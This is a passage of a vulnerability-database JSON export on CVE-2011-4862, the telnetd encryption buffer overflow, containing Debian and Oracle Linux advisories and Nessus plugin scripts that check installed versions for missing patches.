"http://lists.centos.org/pipermail/centos-announce/2011-December/030397.html", "id": "CESA-2011:1851", "title": "krb5 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:28:02", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2372-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nDecember 25, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : heimdal\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4862\n\nIt was discovered that the Kerberos support for telnetd contains a\npre-authentication buffer overflow, which may enable remote attackers\nwho can connect to the Telnet to execute arbitrary code with root\nprivileges.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.dfsg.1-2.1+lenny1.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.0~git20100726.dfsg.1-2+squeeze1.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your heimdal packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-12-25T17:14:56", "published": "2011-12-25T17:14:56", "id": "DEBIAN:DSA-2372-1:C4E25", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00251.html", "title": "[SECURITY] [DSA 2372-1] heimdal security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:18:34", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2375-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nDecember 26, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : krb5, krb5-appl\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4862\n\nIt was discovered that the encryption support for BSD telnetd contains\na pre-authentication buffer overflow, which may enable remote\nattackers who can connect to the Telnet port to execute arbitrary code\nwith root privileges.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.6.dfsg.4~beta1-5lenny7 of the krb5 package.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:1.0.1-1.2 of the krb5-appl package.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your krb5 and krb5-appl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2011-12-26T13:18:47", "published": "2011-12-26T13:18:47", "id": "DEBIAN:DSA-2375-1:FD512", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00254.html", "title": "[SECURITY] [DSA 2375-1] krb5. krb5-appl security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:27:56", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2373-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nDecember 25, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : inetutils\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4862\n\nIt was discovered that the Kerberos support for telnetd contains a\npre-authentication buffer overflow, which may enable remote attackers\nwho can connect to the Telnet to execute arbitrary code with root\nprivileges.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2:1.5.dfsg.1-9+lenny1.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:1.6-3.1+squeeze1.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your inetutils packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-12-25T17:16:11", "published": "2011-12-25T17:16:11", "id": "DEBIAN:DSA-2373-1:B7CB7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00252.html", "title": "[SECURITY] [DSA 2373-1] inetutils security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:05", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "[1.0.1-7]\n- Correct patch, bump release\n[1.0.1-6]\n- Fix for CVE-2011-4862", "edition": 4, "modified": "2011-12-27T00:00:00", "published": "2011-12-27T00:00:00", "id": "ELSA-2011-1852", "href": "http://linux.oracle.com/errata/ELSA-2011-1852.html", "title": "krb5-appl security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "[1.6.1-63.el5_7]\n- Fix for CVE-2011-4862", "edition": 4, "modified": "2011-12-27T00:00:00", "published": "2011-12-27T00:00:00", "id": "ELSA-2011-1851", "href": "http://linux.oracle.com/errata/ELSA-2011-1851.html", "title": "krb5 security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1526", "CVE-2011-4862"], "description": "[1.6.1-70.el5]\n- add upstream patch for telnetd buffer overflow (CVE-2011-4862, #770351)\n[1.6.1-69.el5]\n- ftp: fix a static analysis should-never-happen NULL dereference (#750823)\n[1.6.1-68.el5]\n- backport fixes to teach libkrb5 to use descriptors higher than FD_SETSIZE\n to talk to a KDC by using poll() if it's detected at compile-time, revised\n (#701444, RT#6905)\n[1.6.1-67.el5]\n- add backported patch by way of jbarbuc to free subkeys created by the\n KDC while processing TGS requests (#708516)\n[1.6.1-66.el5]\n- add backported patch by way of several people to better avoid false\n detection of replay attacks when talking to systems with coarse time\n resolution (#713500)\n[1.6.1-65.el5]\n- ftpd: add backported patch to check for errors when calling setegid\n (MITKRB5-SA-2011-005, CVE-2011-1526, #719098)\n[1.6.1-64.el5]\n- klist: don't trip over referral entries when invoked with -s (#729067,\n RT#6915)", "edition": 4, "modified": "2012-03-01T00:00:00", "published": "2012-03-01T00:00:00", "id": "ELSA-2012-0306", "href": "http://linux.oracle.com/errata/ELSA-2012-0306.html", "title": "krb5 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T01:32:24", "description": "According to its self-reported version, the version of AsyncOS running\non the remote Cisco Web Security Appliance (WSA) is affected by a\nremote code execution vulnerability due to a buffer overflow condition\nin the telnet component.", "edition": 26, "published": "2014-11-17T00:00:00", "title": "Cisco Web Security Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/h:cisco:web_security_appliance", "cpe:/o:cisco:asyncos"], "id": "CISCO-SA-20120126-WSA.NASL", "href": "https://www.tenable.com/plugins/nessus/79273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79273);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"EDB-ID\", value:\"18280\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuo90523\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20120126-ironport\");\n\n script_name(english:\"Cisco Web Security Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)\");\n script_summary(english:\"Checks the WSA version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote security appliance is missing a vendor-supplied patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of AsyncOS running\non the remote Cisco Web Security Appliance (WSA) is affected by a\nremote code execution vulnerability due to a buffer overflow condition\nin the telnet component.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6a6592a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCuo90523\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant update referenced in Cisco Security Advisory\ncisco-sa-20120126-ironport.\n\nAlternatively, as a workaround, the vendor notes that Telnet services\ncan be disabled on the device.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-4862\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:web_security_appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:asyncos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_wsa_version.nasl\");\n script_require_keys(\"Host/AsyncOS/Cisco Web Security Appliance/DisplayVersion\", \"Host/AsyncOS/Cisco Web Security Appliance/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndisplay_ver = get_kb_item_or_exit('Host/AsyncOS/Cisco Web Security Appliance/DisplayVersion');\nver = get_kb_item_or_exit('Host/AsyncOS/Cisco Web Security Appliance/Version');\n\n# If not paranoid, check if telnet is detected first.\n# get_service() may fork; don't use.\nif (report_paranoia < 2) get_kb_list_or_exit(\"Services/telnet\");\n\n# Affected/Fixed Cisco AsyncOS Software for Cisco WSA :\n# 7.1 and prior - Not Available - Upgrade to 7.7 or later\n# 7.5 - Not Available - Upgrade to 7.7 or later\n# 7.7 - 7.7.0-757\n# 8.0 - 8.0.6-073\n# 8.1 - 8.1.0-235\nif (\n ver =~ \"^[0-6]\\.\" ||\n ver =~ \"^7\\.[01]\\.\" ||\n ver =~ \"^7\\.5\\.\" ||\n ver =~ \"^7\\.7\\.\"\n)\n display_fix = '7.7.0-757';\nelse if (ver =~ \"^8\\.0\\.\")\n display_fix = '8.0.6-073';\nelse if (ver =~ \"^8\\.1\\.\")\n display_fix = '8.1.0-235';\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'Cisco WSA', display_ver);\n\nfix = str_replace(string:display_fix, find:'-', replace:'.');\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0) audit(AUDIT_INST_VER_NOT_VULN, 'Cisco WSA', display_ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + display_fix + \n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:15", "description": "The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh,\nand rlogin clients and servers. Kerberos is a network authentication\nsystem which allows clients and servers to authenticate to each other\nusing symmetric encryption and a trusted third party, the Key\nDistribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon\n(telnetd). A remote attacker who can access the telnet port of a\ntarget machine could use this flaw to execute arbitrary code as root.\n(CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Scientific Linux. In addition, the default firewall rules\nblock remote access to the telnet port. This flaw does not affect the\ntelnet daemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have\nenabled the krb5 telnet daemon, and have it accessible remotely, this\nupdate should be applied immediately.\n\nAll krb5-appl-server users should upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.", "edition": 25, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : krb5-appl on SL6.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111227_KRB5_APPL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61213", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61213);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4862\");\n\n script_name(english:\"Scientific Linux Security Update : krb5-appl on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh,\nand rlogin clients and servers. Kerberos is a network authentication\nsystem which allows clients and servers to authenticate to each other\nusing symmetric encryption and a trusted third party, the Key\nDistribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon\n(telnetd). A remote attacker who can access the telnet port of a\ntarget machine could use this flaw to execute arbitrary code as root.\n(CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Scientific Linux. In addition, the default firewall rules\nblock remote access to the telnet port. This flaw does not affect the\ntelnet daemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have\nenabled the krb5 telnet daemon, and have it accessible remotely, this\nupdate should be applied immediately.\n\nAll krb5-appl-server users should upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1112&L=scientific-linux-errata&T=0&P=4434\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?930e0f5f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected krb5-appl-clients, krb5-appl-debuginfo and / or\nkrb5-appl-servers packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"krb5-appl-clients-1.0.1-7.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"krb5-appl-debuginfo-1.0.1-7.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"krb5-appl-servers-1.0.1-7.el6_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:10:10", "description": "Updated krb5 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 3 Extended Life Cycle Support, 5.3 Long\nLife and 5.6 Extended Update Support\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nKerberos is a network authentication system which allows clients and\nservers to authenticate to each other using symmetric encryption and a\ntrusted third-party, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon\n(telnetd). A remote attacker who can access the telnet port of a\ntarget machine could use this flaw to execute arbitrary code as root.\n(CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Red Hat Enterprise Linux. In addition, the default firewall\nrules block remote access to the telnet port. This flaw does not\naffect the telnet daemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have\nenabled the telnet daemon, and have it accessible remotely, this\nupdate should be applied immediately.\n\nAll krb5-workstation users should upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.", "edition": 25, "published": "2013-01-24T00:00:00", "title": "RHEL 5 : krb5 (RHSA-2011:1853)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2013-01-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:krb5-libs", "cpe:/o:redhat:enterprise_linux:5.3", "p-cpe:/a:redhat:enterprise_linux:krb5-devel", "p-cpe:/a:redhat:enterprise_linux:krb5-workstation", "p-cpe:/a:redhat:enterprise_linux:krb5-server", "p-cpe:/a:redhat:enterprise_linux:krb5-server-ldap", "cpe:/o:redhat:enterprise_linux:5.6"], "id": "REDHAT-RHSA-2011-1853.NASL", "href": "https://www.tenable.com/plugins/nessus/64017", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1853. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64017);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_xref(name:\"RHSA\", value:\"2011:1853\");\n\n script_name(english:\"RHEL 5 : krb5 (RHSA-2011:1853)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 3 Extended Life Cycle Support, 5.3 Long\nLife and 5.6 Extended Update Support\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nKerberos is a network authentication system which allows clients and\nservers to authenticate to each other using symmetric encryption and a\ntrusted third-party, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon\n(telnetd). A remote attacker who can access the telnet port of a\ntarget machine could use this flaw to execute arbitrary code as root.\n(CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Red Hat Enterprise Linux. In addition, the default firewall\nrules block remote access to the telnet port. This flaw does not\naffect the telnet daemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have\nenabled the telnet daemon, and have it accessible remotely, this\nupdate should be applied immediately.\n\nAll krb5-workstation users should upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4862.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2011-1853.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-server-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"krb5-devel-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"krb5-devel-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"krb5-libs-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"krb5-libs-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"krb5-server-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"krb5-server-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"krb5-workstation-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"krb5-workstation-1.6.1-31.el5_3.5\")) flag++;\n\nif (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"krb5-devel-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"krb5-libs-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"krb5-server-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"krb5-server-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"krb5-server-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"krb5-server-ldap-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"krb5-server-ldap-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"krb5-server-ldap-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"krb5-workstation-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"krb5-workstation-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"krb5-workstation-1.6.1-55.el5_6.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:47:11", "description": "It was discovered that the encryption support for BSD telnetd contains\na pre-authentication buffer overflow, which may enable remote\nattackers who can connect to the Telnet port to execute arbitrary code\nwith root privileges.", "edition": 17, "published": "2012-01-12T00:00:00", "title": "Debian DSA-2375-1 : krb5, krb5-appl - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-12T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:krb5-appl", "p-cpe:/a:debian:debian_linux:krb5", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-2375.NASL", "href": "https://www.tenable.com/plugins/nessus/57515", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The 